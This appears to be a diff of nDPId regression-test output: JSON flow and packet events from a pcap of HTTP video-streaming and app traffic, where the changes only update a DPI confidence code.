01057{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1429000240020,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000240020,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeYVGUAAPwbVhAo2qfp4HCMoyzMAUBi\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"} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":144,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000347103,"flow_last_seen":1429000347103,"flow_idle_time":7580000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000347103,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52021,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
01056{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1429000347103,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000347103,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeaYDkAAPwZSjwo2qfp4HCMoyzUAUMz93a23S9rhUBgBydEWAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNjYudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} -01150{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":144,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000347103,"flow_last_seen":1429000347103,"flow_idle_time":7580000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000347103,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52021,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": 
{"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV510R360\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV510R360-0066.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} +01150{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":144,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000347103,"flow_last_seen":1429000347103,"flow_idle_time":7580000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000347103,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52021,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV510R360\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV510R360-0066.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} 
02077{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":146,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1429000350324,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1248,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":1248,"pkt_l4_len":1212,"thread_ts_msec":1429000350324,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcBNBb\/EAArQYdm3gcIygKNqn6AFDLNbdZW8fM\/d9rUBgIIqcYAAD+T5O3IPZmBv71L8WfkixgJr\/jAt3\/6kLgAlGb+bz0ykowoo+NPkYJoM9UpoIVOvy80c0V1g1txC7AgybX1gMQCPuO2tL7\/YFSRxMejmWc4iVxTJSsqhfOA46142Bs1WbBta5O\/SisV8I6pVbO3GCxSbhFLwGr\/WZMUvJFa03S2huv7nozg+bdD4ixlKAFqDdBblAS5LqKSvj+fOg7qedCUtEMdl2BX1M92lt5m6MQhdflPtDytEcZ0QkUCdMH9OHvhlDAvSTeyAtHyfYMIr7y2wFDjfyFOM32EeqMcgEsS0MQwjTKiEkzEJ8uGfrxRfO5oVpc6VJ+xU5oxB5UzhG8pmTwc93Y2+GfYxPPy6ggTaHy\/d8I7FePvcMuO0KR+65nFfpCrRJnDXWI0WHUQIZcOwglbU1AfE\/G0U1NohfpkoAAnwPGa2AwV3oZoMhAulbVmnnznep4SXoywe87c2ocX2ggVFcYGvjslls5jM+9Mb9jAiJUQob+ptDy09gH34DekuerUkd5kD0BHNFL1qJxKuT2KFfpVgoJcv7HmFi278ssvmuhcKYTndrOnym+1tTrX4yHchzxBIO6GaHA8tKeIbQel4TL1v3Z16t\/5xrJ+Q3\/dZxmuZuNaR\/mbOEVBLzpZG7JjcrFSlppStGfqcXspmqu2LVEQvyEoz7nD3cdIKrnhCpQD85sNyvZh8JPCYo865M5+VSfDtodRJdJU1Nl6DW0MAcLqRvHQY9JW8lvPNvqOY2adRWmAKu7tqvblHXcRcfi1rVtS37DAzU+CITvUZ7K30LaIGtCPuD1JyxuUKBexT3QohOr8Lhst8RR1CzAUG3EjerjlJS4KtFHtNg7GoK88LreN47H4SdxDkAmboeyFID9kUTvhDEEqXlfFOEyBf9Hwqltx9X6rJI\/aCSw0l3eGOtTl3BrAC\/PZaQloz6cS6y\/rAG\/nTUo2JYn9FxvYyn46cJ+Dvj0skCnbuZGkNTSODQ8OYRf91rdXgsLkXz7SvGaVdHhOR9kAXFpWZO7NlKFm7iCcjRGcikx0R+JzsCdgGKw769t40JLLZ2Q7I1fg8xfNUu24vDeA30lrnpOU4r2\/wzGdHdMyj3aW37T\/Pa6QQtQ1KDPtl9xaYHV7eAXl7B\/PrlRzNCxrvA6rIktFl32wWbaV4UONT7uV+4MsIL+HjkWP1O8dgLKVVeYmic1ZUfE8n13QHUcKgu1wZjEhZIqzgLo+waSjiNdfhALL5AB0EpMQXn5\/7OVD3m88BGmhRFUOC2MbYjnNMzH8wAwic5A3Qvz2AIrONrzFcniz\/ItQB42w6KG1uQ+E3nY7gSAkYQOrbzozKOWRZnp2uAnHe4PHe\/OVrr8C50\/kt0TKX5CZ2FJOOqCL0f72chb\/rBb5J0abgAXFRf0RhFz8NBfmLRVAS8iJvF+ExsNR3UUz7Uik5Fcuqlhq\/2+nOX6Vo3ZiRGJ8ebb8KS1vBD76QQNsXfNVIC2g\/pLfmhdq8Adxob5YnXButMrysl7i
AokGOqWwh8nWfQCWcnR9MCedQ9mTBrHLXrhSeAVZOjGNYrbH8nHmLOBBy1qB3E4YD0wwrTIH9U0Sgt1"} 01056{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":147,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1429000350578,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000350578,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeaaEUAAPwZQjAo2qfp4HCMoyzUAUMz932u3WWBvUBhgH+pmAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNjcudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":149,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000375190,"flow_last_seen":1429000375190,"flow_idle_time":7580000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000375190,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52022,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
01056{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":149,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1429000375190,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000375190,"pkt":"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"} -01150{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":149,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000375190,"flow_last_seen":1429000375190,"flow_idle_time":7580000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000375190,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52022,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV510R360\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV510R360-0068.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} 
+01150{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":149,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000375190,"flow_last_seen":1429000375190,"flow_idle_time":7580000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000375190,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52022,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV510R360\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV510R360-0068.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} 
01244{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":150,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1429000378528,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":632,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":632,"pkt_l4_len":596,"thread_ts_msec":1429000378528,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAmhMQkAArAYwvXgcIygKNqn6AFDLNvB8o6L58VK0UBgIIuBYAAD6gvJK3aB9Wdi2WzDeNoMColML2KCtNfUY2CwzdFLplFssslM2yXsBjnaIJOEoejcQpeFF355YUwtgWhdMMI2rg7t6Y06MNF1+oUMraF1z7dOGYZiWEw55N0R\/C4GUApqp4yWGJ\/CM91mr7EMXR6GJMnCnweJmOE9\/g4efV5ECHsiWKrismHwHX5cBOn2yA4HpOUGRsqAyJSxdx43skOx+vp23ro8\/JrEVnLzlB\/lGV2fdWo3w6VLreno\/QTmqd4pUmkkPPriJdaoBuDGz2cVi7p0befEK6oJ\/9C0fIAdMUQBOBN698TN\/3U5eWrczQSMLB8LJ0s1VPNsG+Uk7iZbLm2h44wxC+hzTD6Om+31wmxRZkWLFty4nGoqINn64kMxZ8jk+gAnxToClxMmrRX+tVkrmxooeDNg8O2BoKHSVu0QB4ZTXmBGAzxtP6AAAUY4sOQns2cIzqTR+SY+i5krcNUfqmctlUK2HS0mekAkRZ9Fb5CIveTsXhz6bTGoR+ZwaRiShSLUWZmInPoFtYMo3SK7u+PM7bDKFUbsQjbVXKacOgHhzN29\/N7\/9u6t2jU0DoTZfnm8RO0mzmGxReSHeGiwBid9gvCA11\/mk5FbSERauRsVxeiUkx2WKBttn3weSeMdFTFGBLzM8bDgXW729KN0+91NW+r+XNzcfLAhYR8kvwcN\/mM+lqT\/pSe\/P8rPDJ\/eOsiJDbHhm2\/4+8udWjPDnsNjkEwnYrvxC7JJAG7cy2LCX7EmJxNJ1SyoFMAc="} 01056{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":151,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1429000378725,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000378725,"pkt":"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"} 
-00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1429000030398,"flow_last_seen":1429000039635,"flow_idle_time":7580000,"flow_min_l4_payload_len":309,"flow_max_l4_payload_len":1324,"flow_tot_l4_payload_len":3136,"flow_avg_l4_payload_len":784,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.41","src_port":50668,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1429000030766,"flow_last_seen":1429000040059,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":3456,"flow_avg_l4_payload_len":864,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.41","src_port":50669,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000041481,"flow_last_seen":1429000041819,"flow_idle_time":7580000,"flow_min_l4_payload_len":181,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":232,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"31.13.68.49","src_port":44793,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1429000030398,"flow_last_seen":1429000039635,"flow_idle_time":7580000,"flow_min_l4_payload_len":309,"flow_max_l4_payload_len":1324,"flow_tot_l4_payload_len":3136,"flow_avg_l4_payload_len":784,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.41","src_port":50668,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1429000030766,"flow_last_seen":1429000040059,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":3456,"flow_avg_l4_payload_len":864,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.41","src_port":50669,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} 
+00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000041481,"flow_last_seen":1429000041819,"flow_idle_time":7580000,"flow_min_l4_payload_len":181,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":232,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"31.13.68.49","src_port":44793,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}} 00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1429000050062,"flow_last_seen":1429000052145,"flow_idle_time":7580000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":1169,"flow_avg_l4_payload_len":389,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.151.160","src_port":54883,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000052348,"flow_last_seen":1429000052688,"flow_idle_time":7580000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":529,"flow_avg_l4_payload_len":264,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.129.101","src_port":42761,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Tencent.QQ","breed":"Fun","category":"Chat"}} 
-00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000054595,"flow_last_seen":1429000054967,"flow_idle_time":7580000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":560,"flow_tot_l4_payload_len":765,"flow_avg_l4_payload_len":382,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.129.101","src_port":42762,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Tencent.QQ","breed":"Fun","category":"Chat"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000052348,"flow_last_seen":1429000052688,"flow_idle_time":7580000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":529,"flow_avg_l4_payload_len":264,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.129.101","src_port":42761,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Tencent.QQ","breed":"Fun","category":"Chat"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000054595,"flow_last_seen":1429000054967,"flow_idle_time":7580000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":560,"flow_tot_l4_payload_len":765,"flow_avg_l4_payload_len":382,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.129.101","src_port":42762,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"Tencent.QQ","breed":"Fun","category":"Chat"}} 00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1429000031075,"flow_last_seen":1429000031382,"flow_idle_time":7580000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":302,"flow_tot_l4_payload_len":355,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.5.18","src_port":33064,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000037600,"flow_last_seen":1429000037659,"flow_idle_time":7580000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":266,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.26.231","src_port":33277,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000117728,"flow_last_seen":1429000118045,"flow_idle_time":7580000,"flow_min_l4_payload_len":582,"flow_max_l4_payload_len":775,"flow_tot_l4_payload_len":1357,"flow_avg_l4_payload_len":678,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"54.179.140.65","src_port":56381,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP.Xiaomi","breed":"Acceptable","category":"Web"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000037600,"flow_last_seen":1429000037659,"flow_idle_time":7580000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":266,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.26.231","src_port":33277,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000117728,"flow_last_seen":1429000118045,"flow_idle_time":7580000,"flow_min_l4_payload_len":582,"flow_max_l4_payload_len":775,"flow_tot_l4_payload_len":1357,"flow_avg_l4_payload_len":678,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"54.179.140.65","src_port":56381,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Xiaomi","breed":"Acceptable","category":"Web"}} 
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1429000049060,"flow_last_seen":1429000051518,"flow_idle_time":7580000,"flow_min_l4_payload_len":444,"flow_max_l4_payload_len":1096,"flow_tot_l4_payload_len":2511,"flow_avg_l4_payload_len":627,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52007,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":65,"flow_first_seen":1429000052217,"flow_last_seen":1429000153720,"flow_idle_time":7580000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":42262,"flow_avg_l4_payload_len":650,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52009,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": 